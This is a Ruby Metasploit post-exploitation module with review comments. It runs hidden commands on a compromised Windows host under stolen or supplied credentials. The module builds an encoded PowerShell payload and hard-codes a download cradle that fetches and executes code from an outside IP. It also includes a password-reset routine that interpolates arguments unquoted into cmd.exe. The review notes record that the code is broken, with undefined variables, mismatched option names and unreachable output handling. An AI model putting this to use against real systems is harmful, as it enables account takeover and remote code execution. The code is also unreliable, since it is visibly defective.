##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'rex'

# Local module that launches a process under a different Windows account.
#
# Depending on whether the current session is SYSTEM, #exploit calls either
# create_process_as_user or create_process_with_logon (both from the
# Msf::Post::Windows::Runas mixin) with the DOMAIN / USER / password /
# APPLICATION_NAME / COMMAND_LINE options.
#
# NOTE(review): as written this listing reads like a work-in-progress draft:
# several names are referenced but never defined in this file (cs, outpath),
# the output-collection half of #exploit sits after an unconditional `return`,
# and neither #priv_check nor #reset_pass is called from #exploit. See the
# per-method notes below.
class Metasploit3 < Msf::Exploit::Local
  include Msf::Post::File
  include Msf::Post::Windows::Priv
  include Msf::Exploit::Powershell
  include Msf::Post::Windows::Runas

  # Registers module metadata and options.
  #
  # Basic options: DOMAIN, USER, PASSWORD (all required), APPLICATION_NAME
  # (optional), COMMAND_LINE (required).
  # Advanced options: CMDOUT and SETPASS, both booleans defaulting to false.
  #
  # NOTE(review): #exploit reads the password through datastore["PASS"], not
  # the "PASSWORD" key registered here, and SETPASS is never read anywhere in
  # this file. The description string mentions CMDOUT "set to false" enabling
  # output capture, while the code below tests `if cmdout` (truthy) — the
  # two disagree; the description text is left untouched here.
  def initialize(info={})
    super(update_info(info,
      'Name'           => "Windows Manage Run Command As User",
      'Description'    => %q{ This module will login with the specified username/password and execute the supplied command as a hidden process. Output is not returned by default, by setting CMDOUT to false output will be redirected to a temp file and read back in to display.By setting advanced option SETPASS to true, it will reset the users password and then execute the command. },
      'License'        => MSF_LICENSE,
      'Platform'       => ['win'],
      'SessionTypes'   => ['meterpreter'],
      'Author'         => ['Kx499'],
      'Targets'        => [ [ 'Universal', {} ] ],
      'DefaultTarget'  => 0
    ))

    register_options(
      [
        OptString.new('DOMAIN', [true, 'Domain to login with' ]),
        OptString.new('USER', [true, 'Username to login with' ]),
        OptString.new('PASSWORD', [true, 'Password to login with' ]),
        OptString.new('APPLICATION_NAME', [false, 'Application to be executed (lpApplicationName)']),
        OptString.new('COMMAND_LINE', [true, 'Command line to execute (lpCommandLine)']),
      ], self.class)

    register_advanced_options(
      [
        OptBool.new('CMDOUT', [true, 'Retrieve command output', false]),
        OptBool.new('SETPASS', [true, 'Reset password', false])
      ], self.class)
  end

  # Checks whether the session holds enough privilege for the two process
  # creation paths used by #exploit and records which path applies in @isadmin.
  #
  # - SYSTEM session: queries the token privileges via session.sys.config.getprivs
  #   and requires both SeAssignPrimaryTokenPrivilege and SeIncreaseQuotaPrivilege;
  #   sets @isadmin = false and returns true when present, false otherwise.
  # - Non-SYSTEM admin session (is_admin?): sets @isadmin = true, returns true.
  # - Anything else: returns false.
  #
  # The original author's note: a session that was elevated to SYSTEM (rather
  # than started as SYSTEM) will typically lack SeAssignPrimaryTokenPrivilege;
  # migrating to a process that was started as SYSTEM is the suggested remedy.
  #
  # NOTE(review): contrary to the earlier comment this does not exit the
  # script; it only returns false. It is also never called from #exploit in
  # this listing, so @isadmin is never consulted.
  # NOTE(review): `and` is used for boolean logic; harmless inside `if`, but
  # `&&` avoids the precedence trap if the expression is ever reused.
  def priv_check
    if is_system?
      privs = session.sys.config.getprivs
      if privs.include?("SeAssignPrimaryTokenPrivilege") and privs.include?("SeIncreaseQuotaPrivilege")
        @isadmin = false
        return true
      else
        return false
      end
    elsif is_admin?
      @isadmin = true
      return true
    else
      return false
    end
  end

  # Resets the password of a local account by running `net user <user> <password>`
  # through cmd_exec on the target.
  #
  # @param user [String] account whose password is replaced
  # @param password [String] new password
  # @return [Boolean] true when the command output contains "successfully"
  #
  # NOTE(review): this is destructive — it changes the account's password —
  # and both arguments are interpolated unquoted into a cmd.exe command line,
  # so values containing spaces or shell metacharacters will alter the
  # command. It is not called anywhere in this file (SETPASS is never read).
  def reset_pass(user, password)
    cmd = "cmd.exe /c net user #{user} #{password}"
    r = cmd_exec(cmd)
    return r.include?("successfully")
  end

  # Entry point: creates a process under the supplied credentials.
  #
  # Flow as written:
  # 1. Abort with BadConfig unless the session is meterpreter.
  # 2. Read options from the datastore.
  # 3. SYSTEM session   -> create_process_as_user(...)
  #    otherwise        -> create_process_with_logon(...)
  #    (both from Msf::Post::Windows::Runas); the return value is printed
  #    with `puts`.
  # 4. Unconditional `return`.
  #
  # Everything after step 4 (reading a temp output file, deleting it,
  # unpacking PROCESS_INFORMATION) is unreachable and references `cs` and
  # `outpath`, which are never assigned in this file.
  #
  # NOTE(review): the guard calls `.type` on session.sys.config.sysinfo —
  # presumably `session.type` was intended; verify against the framework API.
  # NOTE(review): datastore["PASS"] does not match the registered "PASSWORD"
  # option, so `password` is nil unless a PASS value is set by hand.
  # NOTE(review): `cmd` (the cmd_psh_payload result) is assigned but never
  # used, and `cmdstr` is a hard-coded lab-style command that only ever
  # reaches a print_status in the dead code below; both look like leftovers.
  # NOTE(review): `puts` bypasses the framework's output routing; print_status
  # / print_line (used further down) is the convention elsewhere in this file.
  def exploit
    fail_with(Exploit::Failure::BadConfig, "Must be a meterpreter session") if session.sys.config.sysinfo.type != "meterpreter"

    # check/set vars
    cmdout = datastore["CMDOUT"]
    user = datastore["USER"]
    password = datastore["PASS"]
    application_name = datastore['APPLICATION_NAME']
    command_line = datastore["COMMAND_LINE"]
    domain = datastore['DOMAIN']
    cmd = cmd_psh_payload(payload.encoded, payload_instance.arch.first, encode_final_payload: true, remove_comspec: true)
    cmdstr = 'powershell.exe -C IEX ((new-object net.webclient).downloadstring(\'http://192.168.5.101:8080/x86\'))'

    # Two creation paths: as SYSTEM a primary token can be assigned directly;
    # otherwise the logon-based variant is used. Which privileges each path
    # needs is what #priv_check tests, but it is not invoked here.
    if is_system?
      puts create_process_as_user(domain, user, password, application_name, command_line)
    else
      puts create_process_with_logon(domain, user, password, application_name, command_line)
      #print_error("Insufficient Privileges, either you are not Admin or system or you elevated")
      #print_error("privs to system and do not have sufficient privileges. If you elevated to")
      #print_error("system, migrate to a process that was started as system (srvhost.exe)")
      #return 0
    end
    # Early exit: nothing below this line executes.
    return

    # Only process file if the process creation was successful, delete when done, give us info
    # about process
    # NOTE(review): unreachable (see `return` above); `cs` and `outpath` are undefined here.
    if cs["return"]
      tmpout = ""
      if cmdout
        # Read the redirected output file back in chunks, then delete it on the target.
        outfile = session.fs.file.new(outpath, "rb")
        until outfile.eof?
          tmpout << outfile.read
        end
        outfile.close
        c = session.sys.process.execute("cmd.exe /c del #{outpath}", nil, {'Hidden' => true})
        c.close
      end

      # Four native-endian 32-bit unsigned fields: hProcess, hThread, dwProcessId, dwThreadId
      pi = cs["lpProcessInformation"].unpack("LLLL")
      print_status("Command Run: #{cmdstr}")
      print_status("Process Handle: #{pi[0]}")
      print_status("Thread Handle: #{pi[1]}")
      print_status("Process Id: #{pi[2]}")
      print_status("Thread Id: #{pi[3]}")
      print_line(tmpout)
    else
      print_error("#{cs["ErrorMessage"]}")
      return 0
    end
  end
end